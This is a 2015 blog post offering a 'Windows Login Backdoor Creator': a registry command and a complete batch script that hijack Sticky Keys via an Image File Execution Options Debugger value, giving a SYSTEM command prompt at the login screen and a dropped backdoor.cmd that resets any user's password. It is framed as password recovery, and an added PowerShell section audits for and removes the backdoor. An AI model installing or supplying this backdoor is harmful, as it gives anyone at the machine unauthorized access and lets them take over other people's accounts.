Saturday, February 21, 2015

Windows Login Backdoor Creator V2.0

Note: This is a revision of the original post 'Creating backdoor at Windows login to reset password after losing it.' found here.

Over the years I have had many people ask me how to get into their computer after they have forgotten their password. There are a few ways to do this either with a bootable cd or usb stick with a 3rd party application, but to be honest this is very unsafe as anyone can get the cd and break into a computer and at the same time you or anyone else that uses such software can cause users or admins to lose data.

The only really safe way to do it is through your command prompt, but without knowing your password you can't get into the profile to use the console, so you are screwed. Recently I have discovered a way to access your command prompt from the Windows login screen by adding a value to the registry. You can create a registry file (.reg) to do this, but today we will just add it via the command prompt:


1. You must open your cmd (command prompt) as administrator, so you can't open it from Run. Go to your start screen, type "cmd" in the search bar, and when you see it right click on it and select "Run as administrator".

2. Type the code below into the prompt:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Triple click on the above code to select all then copy and paste into your command prompt and hit "ENTER".

You now have access to the command prompt at the Windows login screen.

Gain access by either:

  • Pressing SHIFT+ALT+PRTSC (Print Screen) or;
  • Hitting the SHIFT key 5 times in a row (good ol' Sticky Keys).



If you or anyone else on your Windows OS ever loses their password (or you just want to do anything else that you can do from the prompt) you can do it without logging in (be careful though!).

3. When you need to change your password from the prompt, type:
net user username password
Where username is, of course, your username and password is your new password.

EXAMPLE:
net user bob apples
Would change user bob's password to apples, etc.

If your username has a space in it you must wrap it in quotation marks, since a space separates arguments. You must enter it like:

net user "bob for" apples


4. Login with your new password!



Downloads:

New version 2.0 is 90% re-written, with 32 and 64 bit versions to accommodate x86 issues.

Version Info
  • V1.0 - Original, batch script only. Bugs: batch quote issue in paths, installs to wrong path on x86 systems with SysWOW. Bug fixes: none.
  • V2.0 - New re-write, 32 and 64 bit executables. Bugs: no known bugs. Bug fixes: fixed batch quotes in paths issue, fixed install wrong locations issue.

Features
  • Checks for the registry value and the script file and either installs the backdoor or fixes any part that may be broken.
  • Now runs great on Windows XP/Vista/7/8 32 and 64 bit.
I have created a batch file to automate this process so you don't have to do half of this. You can either download it here (Outdated V1.0 old script for archives) or if you are scared of downloading files you can just copy and paste the text below into a batch you create.

  • Right click on your desktop and select New > Text Document.
  • Rename the file from "New Text Document.txt" to "whateveryouwant.bat" (if you can't see the extension, go into Folder Options and uncheck "Hide extensions for known file types", or whatever it is called on your version).
  • Once it's a .bat file, right click on it, select "Edit", paste the code below into it and save the file.
  • Right click on the .bat file you have created and select "Run as administrator" and it will run.
Code to paste in your batch file:
@echo off
Title Windows Login Backdoor Creator
color 0A
rem Path of the helper script written to System32 (backslashes, and quoted wherever it is used)
set "_bscript=%windir%\System32\backdoor.cmd"
cls
mode 54,4
echo(
echo Checking to see if script or registry value exist...
echo(
call :to
rem errorlevel is 0 when the Debugger value exists and 1 when it does not
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger>nul
cls

if [%errorlevel%]==[1] if not exist "%_bscript%" (
call :notFound
cls
call :howTo
call :md
goto :eof
)

if [%errorlevel%]==[0] if not exist "%_bscript%" (
mode 49,5
echo(
echo Registry value exists, but the script does not.
echo Writing script file now...
echo(
call :to
call :writeScript
cls
call :howTo
call :md
goto :eof
)

if [%errorlevel%]==[1] if exist "%_bscript%" (
mode 49,5
echo(
echo Script exists, but the registry value does not.
echo Writing registry value now...
echo(
call :to
call :writeReg
cls
call :howTo
call :md
goto :eof
)
mode 48,5
echo(
echo Both the script and registry value were found,
echo no need to do anything.
echo(
pause
call :md
goto :eof

:notFound
mode 45,5
echo(
echo Backdoor was not found, writing both the
echo registry value and the script file....
echo(
call :to
call :writeBoth
cls
exit /b

:writeBoth
call :writeReg
call :writeScript
exit /b

:writeReg
echo(
echo Creating registry key....
echo(
call :to
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
exit /b

:writeScript
mode 55,4
echo(
echo Creating script^: %_bscript%...
echo(
call :to
if exist "%_bscript%" del "%_bscript%"
echo Creating backdoor.cmd file...
rem %%name%% and %%pass%% are written literally as %name% and %pass% into the helper script
echo @echo off > "%_bscript%"
echo title Create New User Password >> "%_bscript%"
echo echo Enter username to reset your password: >> "%_bscript%"
echo set name= >> "%_bscript%"
echo set pass= >> "%_bscript%"
echo set /P name="Username:" >> "%_bscript%"
echo set /P pass="New Password:" >> "%_bscript%"
echo net user "%%name%%" "%%pass%%" >> "%_bscript%"
echo timeout /t 3 ^>NUL >> "%_bscript%"
echo exit >> "%_bscript%"
exit /b

:howTo
mode 36,10
echo To run:
echo(
echo At the login screen either press
echo shift+alt+printscreen (or prtsc)
echo or hit shift 5 times. This will
echo bring up the command prompt. At
echo the prompt type "backdoor" and
echo follow the instructions to set
echo the new password.
echo(
pause
cls
exit /b

:to
timeout /t 3 >nul
exit /b

:md
color 0F
mode 80,25
exit /b
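For the other side of steps 1 to 4 and of the batch file above, here is an audit and cleanup script, added as an example and not part of the original post or its download. It enumerates the Image File Execution Options keys for sethc.exe and, going beyond the post, the other accessibility helpers the login screen can launch, reports any Debugger value it finds, checks for the helper script the batch file writes to System32, and with -Remove deletes both. The list of binaries beyond sethc.exe, the -Remove switch and the script file name are this example's own choices; run it from an elevated PowerShell.

```powershell
# Added audit/cleanup example (not part of the original post): report and
# optionally remove IFEO Debugger values on the accessibility binaries plus
# the helper script the post's batch file drops into System32.
# Assumptions: elevated PowerShell; the binaries other than sethc.exe are
# this example's own additions; the helper script path matches the batch file.

[CmdletBinding()]
param(
    # Report-only by default; pass -Remove to delete what is found.
    [switch]$Remove
)

$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# sethc.exe is the binary the post hijacks; the rest are accessibility helpers
# reachable from the same screen, audited for completeness (example's choice).
$watched = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
           'magnify.exe', 'displayswitch.exe', 'atbroker.exe'

# Helper script the post's batch file writes (it names it backdoor.cmd).
$helperScript = Join-Path $env:windir 'System32\backdoor.cmd'

$findings = @()
foreach ($exe in $watched) {
    $key = Join-Path $ifeo $exe
    if (-not (Test-Path -LiteralPath $key)) { continue }
    # A Debugger value here makes Windows run that program instead of $exe.
    $dbg = (Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue).Debugger
    if ($dbg) {
        $findings += [pscustomobject]@{ Binary = $exe; Debugger = $dbg; Key = $key }
    }
}

if ($findings.Count -eq 0) {
    Write-Host 'No Debugger values found under IFEO for the watched binaries.'
} else {
    $findings | Format-Table -AutoSize
}

if (Test-Path -LiteralPath $helperScript) {
    Write-Host "Helper script present: $helperScript"
}

if ($Remove) {
    foreach ($f in $findings) {
        # Removing only the Debugger value restores normal launching of the binary.
        Remove-ItemProperty -LiteralPath $f.Key -Name Debugger
        Write-Host "Removed Debugger value from $($f.Key)"
    }
    if (Test-Path -LiteralPath $helperScript) {
        Remove-Item -LiteralPath $helperScript -Force
        Write-Host "Deleted $helperScript"
    }
}
```

Save it as, for example, Audit-Ifeo.ps1 (name assumed); running it without arguments only reports, and running it with -Remove undoes exactly what the batch file above creates, the registry value and backdoor.cmd, without touching anything else under the key.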

New icon I made for it:

[image: green-backdoor_zps376b76e9.png]

Once it starts it will add the registry value shown above to create the access to the command prompt at the Windows login screen, and it will also create a batch file in your System32 folder called "backdoor.cmd", which walks you through an automated process to change your password, so there is no need to type the commands yourself.

  • Run this batch file from the command prompt by typing "backdoor" or "backdoor.cmd" and hit "Enter".
  • It will guide you through the process of changing your password in just a couple of steps.
Again, login and enjoy!!!
